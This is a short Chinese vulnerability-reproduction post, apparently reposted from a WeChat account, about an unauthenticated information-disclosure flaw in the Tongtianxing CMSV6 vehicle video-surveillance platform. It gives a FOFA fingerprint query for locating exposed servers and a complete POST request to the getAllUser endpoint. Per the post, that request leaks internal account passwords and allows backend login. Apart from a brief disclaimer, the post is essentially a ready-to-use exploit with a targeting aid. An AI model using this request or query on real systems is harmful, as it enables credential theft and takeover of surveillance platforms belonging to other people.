免责声明
使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
漏洞描述
通天星CMSV6车载视频监控平台StandardLoginAction_getAllUser.action接口处存在信息泄露漏洞,未经身份认证的攻击者可以通过此漏洞获取系统内部账户密码等敏感信息,登录后台,使系统处于极不安全状态。
资产测绘
FOFA:body="/808gps/"
漏洞复现
POST /808gps/StandardLoginAction_getAllUser.action HTTP/1.1 Host: your-ip User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 json=null
原文始发于微信公众号(漏洞文库):【漏洞复现】通天星CMSV6-车载视频监控平台存在信息泄露漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论